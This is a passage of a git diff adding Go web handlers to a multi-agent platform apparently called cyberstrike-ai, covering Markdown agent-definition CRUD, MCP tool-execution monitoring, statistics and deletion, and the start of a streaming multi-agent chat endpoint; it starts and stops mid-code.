*MarkdownAgentsHandler) ListMarkdownAgents(c *gin.Context) { + if h.dir == "" { + c.JSON(http.StatusOK, gin.H{"agents": []any{}, "dir": "", "error": "未配置 agents 目录"}) + return + } + files, err := agents.LoadMarkdownAgentFiles(h.dir) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + out := make([]gin.H, 0, len(files)) + for _, fa := range files { + sub := fa.Config + out = append(out, gin.H{ + "filename": fa.Filename, + "id": sub.ID, + "name": sub.Name, + "description": sub.Description, + "is_orchestrator": fa.IsOrchestrator, + "kind": sub.Kind, + }) + } + c.JSON(http.StatusOK, gin.H{"agents": out, "dir": h.dir}) +} + +// GetMarkdownAgent GET /api/multi-agent/markdown-agents/:filename +func (h *MarkdownAgentsHandler) GetMarkdownAgent(c *gin.Context) { + filename := c.Param("filename") + path, err := h.safeJoin(filename) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + b, err := os.ReadFile(path) + if err != nil { + if os.IsNotExist(err) { + c.JSON(http.StatusNotFound, gin.H{"error": "文件不存在"}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + sub, err := agents.ParseMarkdownSubAgent(filename, string(b)) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + isOrch := agents.IsOrchestratorLikeMarkdown(filename, sub.Kind) + c.JSON(http.StatusOK, gin.H{ + "filename": filename, + "raw": string(b), + "id": sub.ID, + "name": sub.Name, + "description": sub.Description, + "tools": sub.RoleTools, + "instruction": sub.Instruction, + "bind_role": sub.BindRole, + "max_iterations": sub.MaxIterations, + "kind": sub.Kind, + "is_orchestrator": isOrch, + }) +} + +type markdownAgentBody struct { + Filename string `json:"filename"` + ID string `json:"id"` + Name string `json:"name"` + Description string `json:"description"` + Tools []string `json:"tools"` + Instruction string `json:"instruction"` + BindRole string `json:"bind_role"` + MaxIterations int `json:"max_iterations"` + Kind string `json:"kind"` + Raw string `json:"raw"` +} + +// CreateMarkdownAgent POST /api/multi-agent/markdown-agents +func (h *MarkdownAgentsHandler) CreateMarkdownAgent(c *gin.Context) { + if h.dir == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "未配置 agents 目录"}) + return + } + var body markdownAgentBody + if err := c.ShouldBindJSON(&body); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + filename := strings.TrimSpace(body.Filename) + if filename == "" { + if strings.EqualFold(strings.TrimSpace(body.Kind), "orchestrator") { + filename = agents.OrchestratorMarkdownFilename + } else { + base := agents.SlugID(body.Name) + if base == "" { + base = "agent" + } + filename = base + ".md" + } + } + path, err := h.safeJoin(filename) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if _, err := os.Stat(path); err == nil { + c.JSON(http.StatusConflict, gin.H{"error": "文件已存在"}) + return + } + sub := config.MultiAgentSubConfig{ + ID: strings.TrimSpace(body.ID), + Name: strings.TrimSpace(body.Name), + Description: strings.TrimSpace(body.Description), + Instruction: strings.TrimSpace(body.Instruction), + RoleTools: body.Tools, + BindRole: strings.TrimSpace(body.BindRole), + MaxIterations: body.MaxIterations, + Kind: strings.TrimSpace(body.Kind), + } + base := filepath.Base(path) + if (strings.EqualFold(base, agents.OrchestratorMarkdownFilename) || + strings.EqualFold(base, agents.OrchestratorPlanExecuteMarkdownFilename) || + strings.EqualFold(base, agents.OrchestratorSupervisorMarkdownFilename)) && sub.Kind == "" { + sub.Kind = "orchestrator" + } + if sub.ID == "" { + sub.ID = agents.SlugID(sub.Name) + } + if sub.Name == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "name 必填"}) + return + } + var out []byte + if strings.TrimSpace(body.Raw) != "" { + out = []byte(body.Raw) + } else { + out, err = agents.BuildMarkdownFile(sub) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + } + if want := agents.WantsMarkdownOrchestrator(filepath.Base(path), body.Kind, string(out)); want { + other, oerr := existingOtherOrchestrator(h.dir, filepath.Base(path)) + if oerr != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": oerr.Error()}) + return + } + if other != "" { + c.JSON(http.StatusConflict, gin.H{"error": fmt.Sprintf("已存在主代理定义:%s,请先删除或取消其主代理标记", other)}) + return + } + } + if err := os.MkdirAll(h.dir, 0755); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if err := os.WriteFile(path, out, 0644); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "agent", "markdown_create", "创建 Markdown 子代理", "markdown_agent", filepath.Base(path), nil) + } + c.JSON(http.StatusOK, gin.H{"filename": filepath.Base(path), "message": "已创建"}) +} + +// UpdateMarkdownAgent PUT /api/multi-agent/markdown-agents/:filename +func (h *MarkdownAgentsHandler) UpdateMarkdownAgent(c *gin.Context) { + filename := c.Param("filename") + path, err := h.safeJoin(filename) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + var body markdownAgentBody + if err := c.ShouldBindJSON(&body); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + sub := config.MultiAgentSubConfig{ + ID: strings.TrimSpace(body.ID), + Name: strings.TrimSpace(body.Name), + Description: strings.TrimSpace(body.Description), + Instruction: strings.TrimSpace(body.Instruction), + RoleTools: body.Tools, + BindRole: strings.TrimSpace(body.BindRole), + MaxIterations: body.MaxIterations, + Kind: strings.TrimSpace(body.Kind), + } + if (strings.EqualFold(filename, agents.OrchestratorMarkdownFilename) || + strings.EqualFold(filename, agents.OrchestratorPlanExecuteMarkdownFilename) || + strings.EqualFold(filename, agents.OrchestratorSupervisorMarkdownFilename)) && sub.Kind == "" { + sub.Kind = "orchestrator" + } + if sub.Name == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "name 必填"}) + return + } + if sub.ID == "" { + sub.ID = agents.SlugID(sub.Name) + } + var out []byte + if strings.TrimSpace(body.Raw) != "" { + out = []byte(body.Raw) + } else { + out, err = agents.BuildMarkdownFile(sub) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + } + if want := agents.WantsMarkdownOrchestrator(filename, body.Kind, string(out)); want { + other, oerr := existingOtherOrchestrator(h.dir, filename) + if oerr != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": oerr.Error()}) + return + } + if other != "" { + c.JSON(http.StatusConflict, gin.H{"error": fmt.Sprintf("已存在主代理定义:%s,请先删除或取消其主代理标记", other)}) + return + } + } + if err := os.WriteFile(path, out, 0644); err != nil { + if os.IsNotExist(err) { + c.JSON(http.StatusNotFound, gin.H{"error": "文件不存在"}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "agent", "markdown_update", "更新 Markdown 子代理", "markdown_agent", filename, nil) + } + c.JSON(http.StatusOK, gin.H{"message": "已保存"}) +} + +// DeleteMarkdownAgent DELETE /api/multi-agent/markdown-agents/:filename +func (h *MarkdownAgentsHandler) DeleteMarkdownAgent(c *gin.Context) { + filename := c.Param("filename") + path, err := h.safeJoin(filename) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if err := os.Remove(path); err != nil { + if os.IsNotExist(err) { + c.JSON(http.StatusNotFound, gin.H{"error": "文件不存在"}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "agent", "markdown_delete", "删除 Markdown 子代理", "markdown_agent", filename, nil) + } + c.JSON(http.StatusOK, gin.H{"message": "已删除"}) +} diff --git a/internal/handler/monitor.go b/internal/handler/monitor.go new file mode 100644 index 00000000..81fc8630 --- /dev/null +++ b/internal/handler/monitor.go @@ -0,0 +1,618 @@ +package handler + +import ( + "encoding/json" + "errors" + "io" + "net/http" + "strconv" + "strings" + "time" + + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/security" + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// MonitorHandler 监控处理器 +type MonitorHandler struct { + mcpServer *mcp.Server + externalMCPMgr *mcp.ExternalMCPManager + executor *security.Executor + db *database.DB + logger *zap.Logger + audit *audit.Service +} + +// SetAudit wires platform audit logging. +func (h *MonitorHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +// NewMonitorHandler 创建新的监控处理器 +func NewMonitorHandler(mcpServer *mcp.Server, executor *security.Executor, db *database.DB, logger *zap.Logger) *MonitorHandler { + return &MonitorHandler{ + mcpServer: mcpServer, + externalMCPMgr: nil, // 将在创建后设置 + executor: executor, + db: db, + logger: logger, + } +} + +// SetExternalMCPManager 设置外部MCP管理器 +func (h *MonitorHandler) SetExternalMCPManager(mgr *mcp.ExternalMCPManager) { + h.externalMCPMgr = mgr +} + +// MonitorResponse 监控响应 +type MonitorResponse struct { + Executions []*mcp.ToolExecution `json:"executions"` + Stats map[string]*mcp.ToolStats `json:"stats"` + Timestamp time.Time `json:"timestamp"` + Total int `json:"total,omitempty"` + Page int `json:"page,omitempty"` + PageSize int `json:"page_size,omitempty"` + TotalPages int `json:"total_pages,omitempty"` +} + +// Monitor 获取监控信息 +func (h *MonitorHandler) Monitor(c *gin.Context) { + // 解析分页参数 + page := 1 + pageSize := 20 + if pageStr := c.Query("page"); pageStr != "" { + if p, err := strconv.Atoi(pageStr); err == nil && p > 0 { + page = p + } + } + if pageSizeStr := c.Query("page_size"); pageSizeStr != "" { + if ps, err := strconv.Atoi(pageSizeStr); err == nil && ps > 0 && ps <= 100 { + pageSize = ps + } + } + + // 解析状态筛选参数 + status := c.Query("status") + // 解析工具筛选参数(兼容 mcp__tool 与内部 mcp::tool) + toolName := normalizeToolNameFilter(c.Query("tool")) + + executions, total := h.loadExecutionsWithPagination(page, pageSize, status, toolName) + stats := h.loadStats() + + totalPages := (total + pageSize - 1) / pageSize + if totalPages == 0 { + totalPages = 1 + } + + c.JSON(http.StatusOK, MonitorResponse{ + Executions: executions, + Stats: stats, + Timestamp: time.Now(), + Total: total, + Page: page, + PageSize: pageSize, + TotalPages: totalPages, + }) +} + +func (h *MonitorHandler) loadExecutions() []*mcp.ToolExecution { + executions, _ := h.loadExecutionsWithPagination(1, 1000, "", "") + return executions +} + +func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status, toolName string) ([]*mcp.ToolExecution, int) { + if h.db == nil { + allExecutions := h.mcpServer.GetAllExecutions() + // 如果指定了状态筛选或工具筛选,先进行筛选 + if status != "" || toolName != "" { + filtered := make([]*mcp.ToolExecution, 0) + for _, exec := range allExecutions { + matchStatus := status == "" || exec.Status == status + // 支持部分匹配(模糊搜索) + matchTool := toolNameFilterMatches(exec.ToolName, toolName) + if matchStatus && matchTool { + filtered = append(filtered, exec) + } + } + allExecutions = filtered + } + total := len(allExecutions) + offset := (page - 1) * pageSize + end := offset + pageSize + if end > total { + end = total + } + if offset >= total { + return []*mcp.ToolExecution{}, total + } + return allExecutions[offset:end], total + } + + offset := (page - 1) * pageSize + executions, err := h.db.LoadToolExecutionsWithPagination(offset, pageSize, status, toolName) + if err != nil { + h.logger.Warn("从数据库加载执行记录失败,回退到内存数据", zap.Error(err)) + allExecutions := h.mcpServer.GetAllExecutions() + // 如果指定了状态筛选或工具筛选,先进行筛选 + if status != "" || toolName != "" { + filtered := make([]*mcp.ToolExecution, 0) + for _, exec := range allExecutions { + matchStatus := status == "" || exec.Status == status + // 支持部分匹配(模糊搜索) + matchTool := toolNameFilterMatches(exec.ToolName, toolName) + if matchStatus && matchTool { + filtered = append(filtered, exec) + } + } + allExecutions = filtered + } + total := len(allExecutions) + offset := (page - 1) * pageSize + end := offset + pageSize + if end > total { + end = total + } + if offset >= total { + return []*mcp.ToolExecution{}, total + } + return allExecutions[offset:end], total + } + + // 获取总数(考虑状态筛选和工具筛选) + total, err := h.db.CountToolExecutions(status, toolName) + if err != nil { + h.logger.Warn("获取执行记录总数失败", zap.Error(err)) + // 回退:使用已加载的记录数估算 + total = offset + len(executions) + if len(executions) == pageSize { + total = offset + len(executions) + 1 + } + } + + return executions, total +} + +func (h *MonitorHandler) loadStats() map[string]*mcp.ToolStats { + // 合并内部MCP服务器和外部MCP管理器的统计信息 + stats := make(map[string]*mcp.ToolStats) + + // 加载内部MCP服务器的统计信息 + if h.db == nil { + internalStats := h.mcpServer.GetStats() + for k, v := range internalStats { + stats[k] = v + } + } else { + dbStats, err := h.db.LoadToolStats() + if err != nil { + h.logger.Warn("从数据库加载统计信息失败,回退到内存数据", zap.Error(err)) + internalStats := h.mcpServer.GetStats() + for k, v := range internalStats { + stats[k] = v + } + } else { + for k, v := range dbStats { + stats[k] = v + } + } + } + + // 合并外部MCP管理器的统计信息 + if h.externalMCPMgr != nil { + externalStats := h.externalMCPMgr.GetToolStats() + for k, v := range externalStats { + // 如果已存在,合并统计信息 + if existing, exists := stats[k]; exists { + existing.TotalCalls += v.TotalCalls + existing.SuccessCalls += v.SuccessCalls + existing.FailedCalls += v.FailedCalls + // 使用最新的调用时间 + if v.LastCallTime != nil && (existing.LastCallTime == nil || v.LastCallTime.After(*existing.LastCallTime)) { + existing.LastCallTime = v.LastCallTime + } + } else { + stats[k] = v + } + } + } + + return stats +} + +// GetExecution 获取特定执行记录 +func (h *MonitorHandler) GetExecution(c *gin.Context) { + id := c.Param("id") + + // 先从内部MCP服务器查找 + exec, exists := h.mcpServer.GetExecution(id) + if exists { + c.JSON(http.StatusOK, exec) + return + } + + // 如果找不到,尝试从外部MCP管理器查找 + if h.externalMCPMgr != nil { + exec, exists = h.externalMCPMgr.GetExecution(id) + if exists { + c.JSON(http.StatusOK, exec) + return + } + } + + // 如果都找不到,尝试从数据库查找(如果使用数据库存储) + if h.db != nil { + exec, err := h.db.GetToolExecution(id) + if err == nil && exec != nil { + c.JSON(http.StatusOK, exec) + return + } + } + + c.JSON(http.StatusNotFound, gin.H{"error": "执行记录未找到"}) +} + +// CancelExecution 手动取消进行中的 MCP 工具调用(仅取消该次 tools/call 的上下文,不停止整条 Agent / 迭代任务) +// 请求体可选 JSON:{ "note": "用户说明" },将与工具已返回输出合并交给模型(含「用户终止说明」标题块,与命令行原文区分)。 +func (h *MonitorHandler) CancelExecution(c *gin.Context) { + id := c.Param("id") + if id == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "执行记录ID不能为空"}) + return + } + note := "" + dec := json.NewDecoder(c.Request.Body) + var body struct { + Note string `json:"note"` + } + if err := dec.Decode(&body); err != nil && !errors.Is(err, io.EOF) { + c.JSON(http.StatusBadRequest, gin.H{"error": "请求体须为 JSON,例如 {\"note\":\"说明\"},可为空对象"}) + return + } + note = strings.TrimSpace(body.Note) + if h.mcpServer.CancelToolExecutionWithNote(id, note) { + h.logger.Info("已请求取消 MCP 工具执行", zap.String("executionId", id), zap.String("source", "internal"), zap.Bool("hasNote", note != "")) + c.JSON(http.StatusOK, gin.H{"message": "已发送终止信号", "executionId": id}) + return + } + if h.externalMCPMgr != nil && h.externalMCPMgr.CancelToolExecutionWithNote(id, note) { + h.logger.Info("已请求取消 MCP 工具执行", zap.String("executionId", id), zap.String("source", "external"), zap.Bool("hasNote", note != "")) + c.JSON(http.StatusOK, gin.H{"message": "已发送终止信号", "executionId": id}) + return + } + c.JSON(http.StatusNotFound, gin.H{"error": "未找到进行中的工具执行,或该任务已结束"}) +} + +// BatchGetToolNames 批量获取工具执行的工具名称(消除前端 N+1 请求) +func (h *MonitorHandler) BatchGetToolNames(c *gin.Context) { + var req struct { + IDs []string `json:"ids"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + result := make(map[string]string, len(req.IDs)) + for _, id := range req.IDs { + // 先从内部MCP服务器查找 + if exec, exists := h.mcpServer.GetExecution(id); exists { + result[id] = exec.ToolName + continue + } + // 再从外部MCP管理器查找 + if h.externalMCPMgr != nil { + if exec, exists := h.externalMCPMgr.GetExecution(id); exists { + result[id] = exec.ToolName + continue + } + } + // 最后从数据库查找 + if h.db != nil { + if exec, err := h.db.GetToolExecution(id); err == nil && exec != nil { + result[id] = exec.ToolName + } + } + } + + c.JSON(http.StatusOK, result) +} + +// GetStats 获取统计信息 +func (h *MonitorHandler) GetStats(c *gin.Context) { + stats := h.loadStats() + c.JSON(http.StatusOK, stats) +} + +// CallsTimelinePoint 调用趋势数据点 +type CallsTimelinePoint struct { + T time.Time `json:"t"` + Total int `json:"total"` + Failed int `json:"failed"` +} + +// CallsTimelineSummary 调用趋势汇总 +type CallsTimelineSummary struct { + TotalCalls int `json:"totalCalls"` + Peak int `json:"peak"` +} + +// CallsTimelineResponse 调用趋势响应 +type CallsTimelineResponse struct { + Range string `json:"range"` + Points []CallsTimelinePoint `json:"points"` + Summary CallsTimelineSummary `json:"summary"` +} + +type callsTimelineConfig struct { + rangeKey string + duration time.Duration + bucketSize time.Duration + dailyBuckets bool +} + +func parseCallsTimelineRange(raw string) (callsTimelineConfig, bool) { + switch strings.TrimSpace(raw) { + case "24h": + return callsTimelineConfig{rangeKey: "24h", duration: 24 * time.Hour, bucketSize: time.Hour, dailyBuckets: false}, true + case "30d": + return callsTimelineConfig{rangeKey: "30d", duration: 30 * 24 * time.Hour, bucketSize: 24 * time.Hour, dailyBuckets: true}, true + default: + return callsTimelineConfig{rangeKey: "7d", duration: 7 * 24 * time.Hour, bucketSize: time.Hour, dailyBuckets: false}, true + } +} + +func truncateToBucket(t time.Time, bucketSize time.Duration, dailyBuckets bool) time.Time { + if dailyBuckets { + y, m, d := t.Date() + return time.Date(y, m, d, 0, 0, 0, 0, t.Location()) + } + return t.Truncate(bucketSize) +} + +func buildCallsTimelinePoints(cfg callsTimelineConfig, buckets map[time.Time]struct{ total, failed int }) []CallsTimelinePoint { + now := time.Now() + start := truncateToBucket(now.Add(-cfg.duration), cfg.bucketSize, cfg.dailyBuckets) + end := truncateToBucket(now, cfg.bucketSize, cfg.dailyBuckets) + + points := make([]CallsTimelinePoint, 0) + for current := start; !current.After(end); current = current.Add(cfg.bucketSize) { + val := buckets[current] + points = append(points, CallsTimelinePoint{ + T: current, + Total: val.total, + Failed: val.failed, + }) + } + return points +} + +func (h *MonitorHandler) loadCallsTimeline(cfg callsTimelineConfig) []CallsTimelinePoint { + since := time.Now().Add(-cfg.duration) + bucketMap := make(map[time.Time]struct{ total, failed int }) + + if h.db != nil { + dbBuckets, err := h.db.LoadCallsTimeline(since, cfg.dailyBuckets) + if err != nil { + h.logger.Warn("从数据库加载调用趋势失败,回退到内存数据", zap.Error(err)) + } else { + for _, b := range dbBuckets { + key := truncateToBucket(b.BucketTime, cfg.bucketSize, cfg.dailyBuckets) + entry := bucketMap[key] + entry.total += b.Total + entry.failed += b.Failed + bucketMap[key] = entry + } + return buildCallsTimelinePoints(cfg, bucketMap) + } + } + + for _, exec := range h.mcpServer.GetAllExecutions() { + if exec == nil || exec.StartTime.Before(since) { + continue + } + key := truncateToBucket(exec.StartTime, cfg.bucketSize, cfg.dailyBuckets) + entry := bucketMap[key] + entry.total++ + if exec.Status == "failed" || exec.Status == "cancelled" { + entry.failed++ + } + bucketMap[key] = entry + } + return buildCallsTimelinePoints(cfg, bucketMap) +} + +// GetCallsTimeline 获取 MCP 工具调用趋势 +func (h *MonitorHandler) GetCallsTimeline(c *gin.Context) { + cfg, _ := parseCallsTimelineRange(c.Query("range")) + points := h.loadCallsTimeline(cfg) + + summary := CallsTimelineSummary{} + for _, p := range points { + summary.TotalCalls += p.Total + if p.Total > summary.Peak { + summary.Peak = p.Total + } + } + + c.JSON(http.StatusOK, CallsTimelineResponse{ + Range: cfg.rangeKey, + Points: points, + Summary: summary, + }) +} + +// DeleteExecution 删除执行记录 +func (h *MonitorHandler) DeleteExecution(c *gin.Context) { + id := c.Param("id") + if id == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "执行记录ID不能为空"}) + return + } + + // 如果使用数据库,先获取执行记录信息,然后删除并更新统计 + if h.db != nil { + // 先获取执行记录信息(用于更新统计) + exec, err := h.db.GetToolExecution(id) + if err != nil { + // 如果找不到记录,可能已经被删除,直接返回成功 + h.logger.Warn("执行记录不存在,可能已被删除", zap.String("executionId", id), zap.Error(err)) + c.JSON(http.StatusOK, gin.H{"message": "执行记录不存在或已被删除"}) + return + } + + // 删除执行记录 + err = h.db.DeleteToolExecution(id) + if err != nil { + h.logger.Error("删除执行记录失败", zap.Error(err), zap.String("executionId", id)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "删除执行记录失败: " + err.Error()}) + return + } + + // 更新统计信息(减少相应的计数) + totalCalls := 1 + successCalls := 0 + failedCalls := 0 + if exec.Status == "failed" || exec.Status == "cancelled" { + failedCalls = 1 + } else if exec.Status == "completed" { + successCalls = 1 + } + + if exec.ToolName != "" { + if err := h.db.DecreaseToolStats(exec.ToolName, totalCalls, successCalls, failedCalls); err != nil { + h.logger.Warn("更新统计信息失败", zap.Error(err), zap.String("toolName", exec.ToolName)) + // 不返回错误,因为记录已经删除成功 + } + } + + h.logger.Info("执行记录已从数据库删除", zap.String("executionId", id), zap.String("toolName", exec.ToolName)) + if h.audit != nil { + h.audit.RecordOK(c, "tool", "execution_delete", "删除工具执行记录", "tool_execution", id, map[string]interface{}{ + "tool_name": exec.ToolName, + }) + } + c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除"}) + return + } + + // 如果不使用数据库,尝试从内存中删除(内部MCP服务器) + // 注意:内存中的记录可能已经被清理,所以这里只记录日志 + h.logger.Info("尝试删除内存中的执行记录", zap.String("executionId", id)) + c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"}) +} + +// DeleteExecutions 批量删除执行记录 +func (h *MonitorHandler) DeleteExecutions(c *gin.Context) { + var request struct { + IDs []string `json:"ids"` + } + + if err := c.ShouldBindJSON(&request); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "请求参数无效: " + err.Error()}) + return + } + + if len(request.IDs) == 0 { + c.JSON(http.StatusBadRequest, gin.H{"error": "执行记录ID列表不能为空"}) + return + } + + // 如果使用数据库,先获取执行记录信息,然后删除并更新统计 + if h.db != nil { + // 先获取执行记录信息(用于更新统计) + executions, err := h.db.GetToolExecutionsByIds(request.IDs) + if err != nil { + h.logger.Error("获取执行记录失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "获取执行记录失败: " + err.Error()}) + return + } + + // 按工具名称分组统计需要减少的数量 + toolStats := make(map[string]struct { + totalCalls int + successCalls int + failedCalls int + }) + + for _, exec := range executions { + if exec.ToolName == "" { + continue + } + + stats := toolStats[exec.ToolName] + stats.totalCalls++ + if exec.Status == "failed" || exec.Status == "cancelled" { + stats.failedCalls++ + } else if exec.Status == "completed" { + stats.successCalls++ + } + toolStats[exec.ToolName] = stats + } + + // 批量删除执行记录 + err = h.db.DeleteToolExecutions(request.IDs) + if err != nil { + h.logger.Error("批量删除执行记录失败", zap.Error(err), zap.Int("count", len(request.IDs))) + c.JSON(http.StatusInternalServerError, gin.H{"error": "批量删除执行记录失败: " + err.Error()}) + return + } + + // 更新统计信息(减少相应的计数) + for toolName, stats := range toolStats { + if err := h.db.DecreaseToolStats(toolName, stats.totalCalls, stats.successCalls, stats.failedCalls); err != nil { + h.logger.Warn("更新统计信息失败", zap.Error(err), zap.String("toolName", toolName)) + // 不返回错误,因为记录已经删除成功 + } + } + + h.logger.Info("批量删除执行记录成功", zap.Int("count", len(request.IDs))) + if h.audit != nil { + h.audit.RecordOK(c, "tool", "execution_delete_batch", "批量删除工具执行记录", "tool_execution", "", map[string]interface{}{ + "count": len(request.IDs), + }) + } + c.JSON(http.StatusOK, gin.H{"message": "成功删除执行记录", "deleted": len(executions)}) + return + } + + // 如果不使用数据库,尝试从内存中删除(内部MCP服务器) + // 注意:内存中的记录可能已经被清理,所以这里只记录日志 + h.logger.Info("尝试批量删除内存中的执行记录", zap.Int("count", len(request.IDs))) + c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"}) +} + +// normalizeToolNameFilter 将模型侧 mcp__tool 转为内部存储用的 mcp::tool。 +func normalizeToolNameFilter(name string) string { + name = strings.TrimSpace(name) + if name == "" { + return name + } + if strings.Contains(name, "::") { + return name + } + if idx := strings.Index(name, "__"); idx > 0 { + return name[:idx] + "::" + name[idx+2:] + } + return name +} + +func toolNameFilterMatches(storedName, filter string) bool { + filter = strings.TrimSpace(filter) + if filter == "" { + return true + } + storedLower := strings.ToLower(storedName) + filterLower := strings.ToLower(filter) + if strings.Contains(storedLower, filterLower) { + return true + } + normFilter := strings.ToLower(normalizeToolNameFilter(filter)) + if normFilter != filterLower && strings.Contains(storedLower, normFilter) { + return true + } + return strings.Contains(strings.ReplaceAll(storedLower, "::", "__"), filterLower) +} diff --git a/internal/handler/multi_agent.go b/internal/handler/multi_agent.go new file mode 100644 index 00000000..9a75023c --- /dev/null +++ b/internal/handler/multi_agent.go @@ -0,0 +1,609 @@ +package handler + +import ( + "context" + "encoding/json" + "errors" + "fmt" + "net/http" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/multiagent" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// MultiAgentLoopStream Eino DeepAgent 流式对话(需 config.multi_agent.enabled)。 +func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) { + c.Header("Content-Type", "text/event-stream; charset=utf-8") + c.Header("Cache-Control", "no-cache") + c.Header("Connection", "keep-alive") + if h.config == nil || !h.config.MultiAgent.Enabled { + ev := StreamEvent{Type: "error", Message: "多代理未启用,请在设置或 config.yaml 中开启 multi_agent.enabled"} + b, _ := json.Marshal(ev) + fmt.Fprintf(c.Writer, "data: %s\n\n", b) + done := StreamEvent{Type: "done", Message: ""} + db, _ := json.Marshal(done) + fmt.Fprintf(c.Writer, "data: %s\n\n", db) + if flusher, ok := c.Writer.(http.Flusher); ok { + flusher.Flush() + } + return + } + + var req ChatRequest + if err := c.ShouldBindJSON(&req); err != nil { + event := StreamEvent{Type: "error", Message: "请求参数错误: " + err.Error()} + b, _ := json.Marshal(event) + fmt.Fprintf(c.Writer, "data: %s\n\n", b) + done := StreamEvent{Type: "done", Message: ""} + db, _ := json.Marshal(done) + fmt.Fprintf(c.Writer, "data: %s\n\n", db) + c.Writer.Flush() + return + } + + c.Header("X-Accel-Buffering", "no") + + // 用于在 sendEvent 中判断是否为用户主动停止导致的取消。 + // 注意:baseCtx 会在后面创建;该变量用于闭包提前捕获引用。 + var baseCtx context.Context + + clientDisconnected := false + // 与 sseKeepalive 共用:禁止并发写 ResponseWriter,否则会破坏 chunked 编码(ERR_INVALID_CHUNKED_ENCODING)。 + var sseWriteMu sync.Mutex + var ssePublishConversationID string + sendEvent := func(eventType, message string, data interface{}) { + // 用户主动停止时,Eino 可能仍会并发上报 eventType=="error"。 + // 为避免 UI 看到“取消错误 + cancelled 文案”两条回复,这里直接丢弃取消对应的 error。 + if eventType == "error" && baseCtx != nil { + cause := context.Cause(baseCtx) + if errors.Is(cause, ErrTaskCancelled) || errors.Is(cause, multiagent.ErrInterruptContinue) { + return + } + } + ev := StreamEvent{Type: eventType, Message: message, Data: data} + b, errMarshal := json.Marshal(ev) + if errMarshal != nil { + b = []byte(`{"type":"error","message":"marshal failed"}`) + } + sseLine := make([]byte, 0, len(b)+8) + sseLine = append(sseLine, []byte("data: ")...) + sseLine = append(sseLine, b...) + sseLine = append(sseLine, '\n', '\n') + if ssePublishConversationID != "" && h.taskEventBus != nil { + h.taskEventBus.Publish(ssePublishConversationID, sseLine) + } + if clientDisconnected { + return + } + select { + case <-c.Request.Context().Done(): + clientDisconnected = true + return + default: + } + sseWriteMu.Lock() + _, err := c.Writer.Write(sseLine) + if err != nil { + sseWriteMu.Unlock() + clientDisconnected = true + return + } + if flusher, ok := c.Writer.(http.Flusher); ok { + flusher.Flush() + } else { + c.Writer.Flush() + } + sseWriteMu.Unlock() + } + + h.logger.Info("收到 Eino DeepAgent 流式请求", + zap.String("conversationId", req.ConversationID), + ) + + prep, err := h.prepareMultiAgentSession(&req, c, "multi_agent_stream") + if err != nil { + sendEvent("error", err.Error(), nil) + sendEvent("done", "", nil) + return + } + ssePublishConversationID = prep.ConversationID + if prep.CreatedNew { + sendEvent("conversation", "会话已创建", map[string]interface{}{ + "conversationId": prep.ConversationID, + }) + } + + conversationID := prep.ConversationID + assistantMessageID := prep.AssistantMessageID + h.activateHITLForConversation(conversationID, req.Hitl) + if h.hitlManager != nil { + defer h.hitlManager.DeactivateConversation(conversationID) + } + + if prep.UserMessageID != "" { + sendEvent("message_saved", "", map[string]interface{}{ + "conversationId": conversationID, + "userMessageId": prep.UserMessageID, + }) + } + + var cancelWithCause context.CancelCauseFunc + curFinalMessage := prep.FinalMessage + segmentUserMessage := prep.FinalMessage // 本请求原始用户句,临时重试时不得丢失 + curHistory := prep.History + roleTools := prep.RoleTools + orch := strings.TrimSpace(req.Orchestration) + + taskStatus := "completed" + // 仅在成功 StartTask 后再 FinishTask;避免「任务已存在」分支 return 时误删正在运行的同会话任务。 + taskOwned := false + defer func() { + if taskOwned { + h.tasks.FinishTask(conversationID, taskStatus) + } + }() + + sendEvent("progress", "正在启动 Eino 多代理...", map[string]interface{}{ + "conversationId": conversationID, + }) + + stopKeepalive := make(chan struct{}) + go sseKeepalive(c, stopKeepalive, &sseWriteMu) + defer close(stopKeepalive) + + var result *multiagent.RunResult + var runErr error + + 